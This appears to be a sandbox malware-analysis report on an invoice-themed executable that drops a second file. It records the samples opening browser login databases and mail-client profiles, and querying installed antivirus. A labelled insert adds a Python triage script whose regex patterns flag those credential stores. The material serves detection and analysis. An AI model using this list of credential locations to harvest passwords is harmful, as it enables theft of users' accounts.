                        Source: C:\Users\user\Desktop\TT Invoice copy.exeQueries volume information: C:\Windows\Fonts\ROCCB___.TTF VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\TT Invoice copy.exeQueries volume information: C:\Windows\Fonts\SNAP____.TTF VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\TT Invoice copy.exeQueries volume information: C:\Windows\Fonts\micross.ttf VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\TT Invoice copy.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformationJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.Management.Infrastructure.Native\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.Native.dll VolumeInformationJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformationJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformationJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1.cat VolumeInformationJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformationJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformationJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.Management.Infrastructure.Native\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.Native.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Users\user\Desktop\TT Invoice copy.exe | Queries volume information: C:\Users\user\Desktop\TT Invoice copy.exe VolumeInformation
Source: C:\Users\user\Desktop\TT Invoice copy.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
Source: C:\Users\user\Desktop\TT Invoice copy.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
Source: C:\Users\user\Desktop\TT Invoice copy.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformation
Source: C:\Users\user\Desktop\TT Invoice copy.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
Source: C:\Users\user\Desktop\TT Invoice copy.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation
Source: C:\Users\user\AppData\Roaming\pUAQmWA.exe | Queries volume information: C:\Users\user\AppData\Roaming\pUAQmWA.exe VolumeInformation
Source: C:\Users\user\AppData\Roaming\pUAQmWA.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
Source: C:\Users\user\AppData\Roaming\pUAQmWA.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
Source: C:\Users\user\AppData\Roaming\pUAQmWA.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation
Source: C:\Users\user\AppData\Roaming\pUAQmWA.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
Source: C:\Users\user\AppData\Roaming\pUAQmWA.exe | Queries volume information: C:\Users\user\AppData\Roaming\pUAQmWA.exe VolumeInformation
Source: C:\Users\user\AppData\Roaming\pUAQmWA.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
Source: C:\Users\user\AppData\Roaming\pUAQmWA.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
Source: C:\Users\user\AppData\Roaming\pUAQmWA.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformation
Source: C:\Users\user\AppData\Roaming\pUAQmWA.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
Source: C:\Users\user\AppData\Roaming\pUAQmWA.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation
Source: C:\Users\user\Desktop\TT Invoice copy.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid
Source: C:\Windows\System32\conhost.exe | WMI Queries: IWbemServices::CreateInstanceEnum - root\SecurityCenter2 : AntiVirusProduct
Source: C:\Windows\System32\conhost.exe | WMI Queries: IWbemServices::CreateInstanceEnum - root\SecurityCenter2 : AntiVirusProduct

Stealing of Sensitive Information

Source: Yara match | File source: 13.2.pUAQmWA.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 0.2.TT Invoice copy.exe.3a4c0e0.11.unpack, type: UNPACKEDPE
Source: Yara match | File source: 9.2.pUAQmWA.exe.36d1c88.12.unpack, type: UNPACKEDPE
Source: Yara match | File source: 9.2.pUAQmWA.exe.370d0a8.10.unpack, type: UNPACKEDPE
Source: Yara match | File source: 0.2.TT Invoice copy.exe.3a10cc0.10.unpack, type: UNPACKEDPE
Source: Yara match | File source: 9.2.pUAQmWA.exe.370d0a8.10.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 9.2.pUAQmWA.exe.36d1c88.12.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 0.2.TT Invoice copy.exe.3a10cc0.10.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 0.2.TT Invoice copy.exe.3a4c0e0.11.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 00000008.00000002.2889363476.0000000002CB4000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 0000000D.00000002.2888895822.0000000003301000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 0000000D.00000002.2888895822.0000000003327000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 0000000D.00000002.2888895822.000000000334B000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000008.00000002.2889363476.0000000002CD9000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000008.00000002.2889363476.0000000002CFE000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000009.00000002.1721632586.00000000036D1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 0000000D.00000002.2884744372.0000000000431000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000000.00000002.1682284235.0000000003A10000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: Process Memory Space: TT Invoice copy.exe PID: 6716, type: MEMORYSTR
Source: Yara match | File source: Process Memory Space: TT Invoice copy.exe PID: 7508, type: MEMORYSTR
Source: Yara match | File source: Process Memory Space: pUAQmWA.exe PID: 7612, type: MEMORYSTR
Source: Yara match | File source: Process Memory Space: pUAQmWA.exe PID: 7896, type: MEMORYSTR
Source: Yara match | File source: TT Invoice copy.exe, type: SAMPLE
Source: Yara match | File source: 0.0.TT Invoice copy.exe.330000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 00000000.00000000.1633307056.0000000000332000.00000002.00000001.01000000.00000003.sdmp, type: MEMORY
Source: Yara match | File source: C:\Users\user\AppData\Roaming\pUAQmWA.exe, type: DROPPED
Source: C:\Users\user\AppData\Roaming\pUAQmWA.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
Source: C:\Users\user\AppData\Roaming\pUAQmWA.exe | File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data
Source: C:\Users\user\AppData\Roaming\pUAQmWA.exe | File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\profiles.ini
Source: C:\Users\user\Desktop\TT Invoice copy.exe | File opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.ini
Source: C:\Users\user\Desktop\TT Invoice copy.exe | File opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.ini
Source: C:\Users\user\Desktop\TT Invoice copy.exe | Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles
Source: C:\Users\user\Desktop\TT Invoice copy.exe | Key opened: HKEY_CURRENT_USER\Software\IncrediMail\Identities
Source: C:\Users\user\AppData\Roaming\pUAQmWA.exe | File opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.ini
Source: C:\Users\user\AppData\Roaming\pUAQmWA.exe | File opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.ini
Source: C:\Users\user\AppData\Roaming\pUAQmWA.exe | Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles
Source: C:\Users\user\AppData\Roaming\pUAQmWA.exe | Key opened: HKEY_CURRENT_USER\Software\IncrediMail\Identities
Source: Yara match | File source: 13.2.pUAQmWA.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 0.2.TT Invoice copy.exe.3a4c0e0.11.unpack, type: UNPACKEDPE
Source: Yara match | File source: 9.2.pUAQmWA.exe.36d1c88.12.unpack, type: UNPACKEDPE
Source: Yara match | File source: 9.2.pUAQmWA.exe.370d0a8.10.unpack, type: UNPACKEDPE
Source: Yara match | File source: 0.2.TT Invoice copy.exe.3a10cc0.10.unpack, type: UNPACKEDPE
Source: Yara match | File source: 9.2.pUAQmWA.exe.370d0a8.10.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 9.2.pUAQmWA.exe.36d1c88.12.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 0.2.TT Invoice copy.exe.3a10cc0.10.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 0.2.TT Invoice copy.exe.3a4c0e0.11.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 00000008.00000002.2889363476.0000000002CB4000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 0000000D.00000002.2888895822.0000000003301000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000009.00000002.1721632586.00000000036D1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 0000000D.00000002.2884744372.0000000000431000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000000.00000002.1682284235.0000000003A10000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: Process Memory Space: TT Invoice copy.exe PID: 6716, type: MEMORYSTR
Source: Yara match | File source: Process Memory Space: TT Invoice copy.exe PID: 7508, type: MEMORYSTR
Source: Yara match | File source: Process Memory Space: pUAQmWA.exe PID: 7612, type: MEMORYSTR
Source: Yara match | File source: Process Memory Space: pUAQmWA.exe PID: 7896, type: MEMORYSTR
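The rows in this section are flat "Source ... File opened / Key opened ..." evidence. As an added example (not part of the Joe Sandbox report), the Python below parses such rows into structured records and flags the credential stores this sample touched: Chromium "Login Data" databases, Firefox and Thunderbird profiles.ini, the MAPI "Windows Messaging Subsystem\Profiles" key and IncrediMail "Identities". The sample rows are copied from the report; the browser/mail categories, the regular expressions and the helper names are assumptions made for triage.

```python
import re
from dataclasses import dataclass
from typing import Dict, List, Tuple

# Constructed sample: behaviour rows copied from the report, in the fused
# "Source: <process><Action>: <target>[Jump to behavior]" form of the extracted page.
SAMPLE_ROWS = r"""
Source: C:\Users\user\AppData\Roaming\pUAQmWA.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
Source: C:\Users\user\AppData\Roaming\pUAQmWA.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data
Source: C:\Users\user\AppData\Roaming\pUAQmWA.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\profiles.ini
Source: C:\Users\user\Desktop\TT Invoice copy.exeFile opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.iniJump to behavior
Source: C:\Users\user\Desktop\TT Invoice copy.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\ProfilesJump to behavior
Source: C:\Users\user\Desktop\TT Invoice copy.exeKey opened: HKEY_CURRENT_USER\Software\IncrediMail\IdentitiesJump to behavior
Source: C:\Users\user\Desktop\TT Invoice copy.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior
Source: C:\Windows\System32\conhost.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\SecurityCenter2 : AntiVirusProduct
"""

# Action labels Joe Sandbox prints between the source process and the target.
ACTIONS = ("File opened", "Key opened", "Key value queried",
           "Queries volume information", "WMI Queries", "File source")

# Non-greedy source stops at the first action label; an optional " | " separator
# is accepted so cleaned-up rows parse too; the "Jump to behavior" link label is dropped.
ROW_RE = re.compile(
    r"^Source:\s*(?P<source>.+?)\s*\|?\s*"
    + r"(?P<action>" + "|".join(re.escape(a) for a in ACTIONS) + r"):\s*"
    + r"(?P<target>.+?)(?:Jump to behavior)?\s*$"
)


@dataclass(frozen=True)
class Row:
    source: str
    action: str
    target: str


def parse_rows(text: str) -> List[Row]:
    """Split report behaviour rows into (source process, action, target) records."""
    rows: List[Row] = []
    for line in text.splitlines():
        m = ROW_RE.match(line.strip())
        if m:
            rows.append(Row(m["source"], m["action"], m["target"]))
    return rows


# Credential stores seen in the report. The category labels are an assumption.
CRED_STORES: List[Tuple[str, re.Pattern]] = [
    ("browser", re.compile(r"\\(Google\\Chrome|Microsoft\\Edge)\\User Data\\.*\\Login Data$", re.I)),
    ("browser", re.compile(r"\\Mozilla\\Firefox\\profiles\.ini$", re.I)),
    ("mail", re.compile(r"\\Thunderbird\\profiles\.ini$", re.I)),
    ("mail", re.compile(r"\\Windows Messaging Subsystem\\Profiles$", re.I)),
    ("mail", re.compile(r"\\IncrediMail\\Identities$", re.I)),
]


def credential_access(rows: List[Row]) -> List[Tuple[str, str, str]]:
    """Return (source, category, target) for every file/key open that hits a credential store."""
    hits = []
    for r in rows:
        if r.action not in ("File opened", "Key opened"):
            continue
        for category, pattern in CRED_STORES:
            if pattern.search(r.target):
                hits.append((r.source, category, r.target))
                break
    return hits


def summarize(rows: List[Row]) -> Dict[str, List[str]]:
    """Map each source process to the sorted list of credential-store categories it touched."""
    out: Dict[str, set] = {}
    for source, category, _ in credential_access(rows):
        out.setdefault(source, set()).add(category)
    return {k: sorted(v) for k, v in out.items()}


if __name__ == "__main__":
    for source, categories in summarize(parse_rows(SAMPLE_ROWS)).items():
        print(f"{source}: {', '.join(categories)}")
```

Only "File opened" and "Key opened" rows count as access; the MachineGuid query and the SecurityCenter2 WMI query parse but are not credential-store hits, which keeps the summary focused on what the "Tries to harvest and steal browser information" and "Tries to steal Mail credentials" signatures are built on.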

Remote Access Functionality

Source: Yara match | File source: 13.2.pUAQmWA.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 0.2.TT Invoice copy.exe.3a4c0e0.11.unpack, type: UNPACKEDPE
